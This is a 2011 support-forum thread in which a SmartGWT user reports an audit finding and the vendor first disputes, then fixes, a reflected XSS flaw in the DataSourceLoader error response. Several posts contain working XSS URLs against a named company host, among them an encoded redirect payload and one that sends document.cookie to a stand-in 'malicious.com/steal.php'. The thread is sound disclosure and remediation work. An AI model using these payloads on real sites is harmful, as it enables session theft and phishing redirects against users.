Announcement

**mkunnumpurath** · 14 May 2011, 03:22

I have tried using data source fields for combo box and it works fantastic. Please find the screen attached.

Many thanks for your help

Attached Files

**ttran** · 13 Oct 2011, 10:40

We are going through our security audit. I am getting hit with XSS issue on my application. Is there a way I can set this for all my data source?

Can I do set the escapeHTML=true in my DS? For each field?

Thanks,

**Isomorphic** · 13 Oct 2011, 11:37

We don't have a single setting at the DataSource level that sets this property for all fields - you have to set it for each field you care about directly.

**ttran** · 14 Oct 2011, 11:02

I have an application that is retrieving data and I am adding some additional filters on the retrieve. The URL that is generated by smartGWT to make this call is:

https://esdqa.halliburton.com/download/download/sc/DataSourceLoader?dataSource=Preference%3csCrIpT%3ealert(31337)%3c%2fsCrIpT%3e%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI%2cPsContactInfoDMI%2cPreferenceDMI

Our security team is saying that this URL has vunerbility. Can you help me fix this? Where do I have to decode all my variable...

Thanks,

**Isomorphic** · 14 Oct 2011, 14:03

All this request is doing is sending names of DataSources to download, it isn't sending actual data. The only response the server can make from this request is the serialized forms of the named DataSources, which are defined securely on the server. Could you tell us what exactly the perceived vulnerability is?

**ttran** · 17 Oct 2011, 10:25

Is there a way you can just from the framwork encode the URL string before we send it accross the wire?

**Isomorphic** · 18 Oct 2011, 21:12

This is not a security vulnerability and we do not plan any changes in this area. If you believe there is a vulnerability here, please provide a runnable sample of an exploit that is made possible because DataSource names are not encoded.

**ttran** · 19 Oct 2011, 13:56

I am assuming the server code is validating the URL before it gets converted to an RMI call.

I Agree that it is not processing certain unacceptable values, but importantly the string should also disallow these characters:
< > -' "/ \ ( ) @ * to prevent script execution.

**Isomorphic** · 19 Oct 2011, 17:50

There is no way for special characters to lead the script execution and RMI is not involved. Again, if you disagree, please provide exploit code.

**ttran** · 20 Oct 2011, 10:25

Step 1: The malicious user sends an email to the Halliburton user enticing him to navigate to the following URL:

https://esdqa.halliburton.com/download/download/sc/DataSourceLoader?dataSource=Preference%3csCrIpT%3edocument.location="%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d";%3c%2fsCrIpT%3e%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI%2cPsContactInfoDMI%2cPreferenceDMI

Note: Assuming http://www.google.com as a malicious page. In the wild, the attacker would replace it with his own page.

Step 2: The Halliburton user clicks the link and gets redirected to the attacker's malicious page.

Moreover, to escalate the attack, the attacker can also use document.cookie value to steal the user's current session ID. For example:

https://esdqa.halliburton.com/download/download/sc/DataSourceLoader?dataSource=Preference%3csCrIpT%3edocument.location="http://malicious.com/steal.php?giveme=+'document.cookie'";%3c%2fsCrIpT%3e%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI%2cPsContactInfoDMI%2cPreferenceDMI

**Isomorphic** · 20 Oct 2011, 12:37

?? This could only happen if the server were bouncing that encoded script back to the client for evaluation, which it will not do:

The only response the server can make from this request is the serialized forms of the named DataSources, which are defined securely on the server

If you actually try to browse to the link you are suggesting is an exploit, you will see that the server just complains that you haven't provided a proper dataSource parameter.

**ttran** · 24 Oct 2011, 12:35

The link below will redirect you to Google.com

https://esdqa.halliburton.com/download/download/sc/DataSourceLoader?dataSource=Preference%3csCrIpT%3edocument.location="%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d";%3c%2fsCrIpT%3e%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI%2cPsContactInfoDMI%2cPreferenceDMI

**ttran** · 24 Oct 2011, 21:04

I am not sure why by on the post of this message the URL is is posting with some spaces in them.

https://esdqa.halliburton.com/download/download/sc/DataSourceLoader?dataSource=Preference%3csCrIpT%3edocument.location="%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d";%3c%2fsCrIpT%3e%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI%2cPsContactInfoDMI%2cPreferenceDMI

**ttran** · 25 Oct 2011, 08:40

Obviously you are not replying to my query on this. However, we do have an issue and it be resolve at the framework level or at my level. Would you say running my criterias through an Htmlencoder will work?

I still think it may be easier on your side since you control the code. Another word if you add an overloaded function to encode the data that should takes care of everything.

Thanks,

**Isomorphic** · 25 Oct 2011, 08:44

Ah, so the problem is specifically the error response for bad DataSource names. Please be more clear in the future as you originally reported this as some kind of issue with URL encoding and/or with how the framework loads DataSource (which is not a valid issue).

To prevent this, you can add error handling code to DataSourceLoader that does not send back a friendly response in the case of a missing DataSource. However we have just changed the framework to deal with this automatically, and the change will be present in the next nightly build.

Announcement

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment